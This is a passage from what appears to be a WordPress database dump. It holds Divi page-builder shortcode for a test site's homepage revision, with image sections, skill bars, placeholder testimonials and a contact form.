omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:10:06','2020-08-07 20:10:06','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(596,1,'2020-08-07 20:13:46','2020-08-07 20:13:46','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span 